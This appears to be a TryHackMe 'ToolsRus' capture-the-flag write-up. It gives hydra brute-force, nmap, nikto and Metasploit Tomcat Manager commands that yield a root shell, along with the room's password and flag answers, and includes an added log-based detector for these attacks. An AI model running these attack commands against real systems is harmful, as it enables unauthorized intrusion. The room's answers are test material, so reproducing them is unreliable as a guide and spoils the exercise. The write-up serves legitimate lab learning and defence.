ToolsRus WriteUp – TryHackMe


In this article I will walk through the solution of the “ToolsRus” room on the tryhackme site. The room is an entertaining exercise built around the “Nikto”, “Dirb”, “Nmap” and “Meterpreter” tools.

I will use the web-based Kali Linux system that tryhackme provided me. I will support the answers with many pictures.

My private IP: 10.10.73.132

Machine IP: 10.10.176.215


[Task 1] ToolsRus

#1 What directory can you find, that begins with a “g”?

To find the answer to this question, I need to run “Dirb”.

In the picture above you see the “dirb” result. I showed the answer to the question with a red arrow.

ANSWER: guidelines


#2 Whose name can you find from this directory?

To find the answer to this question, we need to go to the “guidelines” directory.

ANSWER: bob


#3 What directory has basic authentication?

To find the answer to this question, we need to check the other directories we obtained as a result of the “dirb” scan.

ANSWER: protected


#4 What is bob’s password to the protected part of the website?

We need to use the “hydra” tool to find the answer to this question. “Hydra” needs a wordlist, so I copied the “rockyou.txt” file to the “/root/Desktop” directory. We will run “hydra” against the HTTP basic authentication on “/protected/” for the username “bob”.

hydra -l bob -P <wordlist location> -f <machine IP> http-get /protected/

The “hydra” command I ran against my machine is as follows, along with its result. “Hydra” finds the password of the user “bob”.

hydra -l bob -P /root/Desktop/rockyou.txt -f 10.10.176.215 http-get /protected/

ANSWER: bubbles


#5 What other port that serves a web service is open on the machine?

To find the answer to this question, we need to query “nmap”. My query is as follows.

nmap -sC -sV -A -v <machine IP> 

ANSWER: 1234


#6 Going to the service running on that port, what is the name and version of the software?

The answer is seen in the “nmap” query above.

ANSWER: Apache Tomcat/7.0.88


#7 Use Nikto with the credentials you have found and scan the /manager/html directory on the port found above. How many documentation files did Nikto identify?

To find the answer to this question, I wrote a “nikto” query like this. I put a red mark next to the answers.

nikto -h http://<machine IP>:1234/manager/html -id bob:<bob password>

ANSWER: 5


#8 What is the server version (run the scan against port 80)?

The answer to this question is found in the “nmap” query above.

ANSWER: Apache/2.4.18


#9 What version of Apache-Coyote is this service using?

The answer to this question is found in the “nmap” query above.

ANSWER: 1.1


#10 Use Metasploit to exploit the service and get a shell on the system. What user did you get a shell as?

To find the answer to this question, let’s first do some research. First, let’s login with “bob” user on “Tomcat” web page.

We went to the “http://<machine IP>:1234/manager/html” page, logged in with the password we found for the user “bob” and reached the Tomcat Manager page shown above. Let’s try to get into the system using the “metasploit” framework.

After running the msfconsole application, I searched for “tomcat” for vulnerabilities. Just use the command below.

search tomcat

The results are as follows.

I will use module number 17 from the search results. You can select it with the command below.

use 17

Now let’s view the options we need.

You can use the following commands respectively.

set HttpPassword bubbles
set HttpUsername bob
set RHOSTS <machine IP>
set RPORT 1234

After I fill them in, I check them again with the “show options” command.

As you can see, this is the result after filling. Now let’s run this. Just use the command below.

run

After running it I immediately got a “shell”. I then checked which user the shell was running as.

ANSWER: root
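The two steps that actually compromised this box, the basic-auth password guessing against “/protected/” in question #4 and the WAR deployment through the Tomcat Manager in question #10, both leave obvious traces in the web server access logs. The following detector is an added example written for this write-up and is not part of the room or of any tool it uses. It assumes Apache/Tomcat combined-log-format lines and a Manager application mounted at the default “/manager” path; the sample log lines are constructed, not captured from the machine.

```python
import re
from collections import defaultdict

# Apache/Tomcat combined-log-format line, e.g.
# 10.10.73.132 - bob [18/Jun/2020:10:00:01 +0000] "GET /protected/ HTTP/1.1" 401 381
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Manager endpoints through which a WAR can be deployed.
# Assumption: a default Tomcat Manager installation under /manager.
MANAGER_DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy", "/manager/deploy")


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def find_basic_auth_bruteforce(lines, threshold=10):
    """Flag (ip, path) pairs with at least `threshold` 401 responses and note
    whether the same source later got a 200 on that path (a likely guessed password)."""
    failures = defaultdict(int)
    succeeded = set()
    for rec in filter(None, map(parse_line, lines)):
        key = (rec["ip"], rec["path"])
        if rec["status"] == 401:
            failures[key] += 1
        elif rec["status"] == 200 and failures.get(key, 0) >= threshold:
            succeeded.add(key)
    return [
        {"ip": ip, "path": path, "failed_attempts": n,
         "later_success": (ip, path) in succeeded}
        for (ip, path), n in sorted(failures.items())
        if n >= threshold
    ]


def find_manager_deploys(lines):
    """Return write requests to a Manager deployment endpoint (WAR upload/deploy)."""
    hits = []
    for rec in filter(None, map(parse_line, lines)):
        if rec["method"] in ("POST", "PUT") and rec["path"] in MANAGER_DEPLOY_PATHS:
            hits.append({"ip": rec["ip"], "user": rec["user"],
                         "method": rec["method"], "path": rec["path"]})
    return hits


# Constructed sample log (not captured from the room): twelve failed basic-auth
# attempts on /protected/ from one source, then a success, then a WAR upload
# through the Manager app, one unrelated visitor, and one unparseable line.
SAMPLE_LOG = (
    ['10.10.73.132 - bob [18/Jun/2020:10:00:%02d +0000] "GET /protected/ HTTP/1.1" 401 381' % i
     for i in range(12)]
    + ['10.10.73.132 - bob [18/Jun/2020:10:00:13 +0000] "GET /protected/ HTTP/1.1" 200 1274',
       '10.10.10.5 - - [18/Jun/2020:10:01:00 +0000] "GET /guidelines/ HTTP/1.1" 200 512',
       '10.10.73.132 - bob [18/Jun/2020:10:05:10 +0000] "GET /manager/html HTTP/1.1" 200 8822',
       '10.10.73.132 - bob [18/Jun/2020:10:05:12 +0000] '
       '"POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 302 0',
       'garbage line that does not parse']
)

if __name__ == "__main__":
    for alert in find_basic_auth_bruteforce(SAMPLE_LOG):
        print("brute force:", alert)
    for hit in find_manager_deploys(SAMPLE_LOG):
        print("manager deploy:", hit)
```

On the sample data the first function reports one source with twelve 401s on “/protected/” followed by a 200, and the second reports the POST to “/manager/html/upload”. Either signal on its own is worth an alert; a 401 burst followed by a success, then a Manager deployment from the same address, is the exact sequence this write-up walks through. The threshold is deliberately a parameter, since a real site has to be tuned against its own rate of legitimate typos.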


#11 What text is in the file /root/flag.txt

The answer to this question actually appears in the picture above.

ANSWER: ff1fc4a81affcc7688cf89ae7dc6e0e1


If you have made it this far, congratulations. I tried to explain everything in as much detail as I could, and I hope it helped you.

See you in the next write-up.
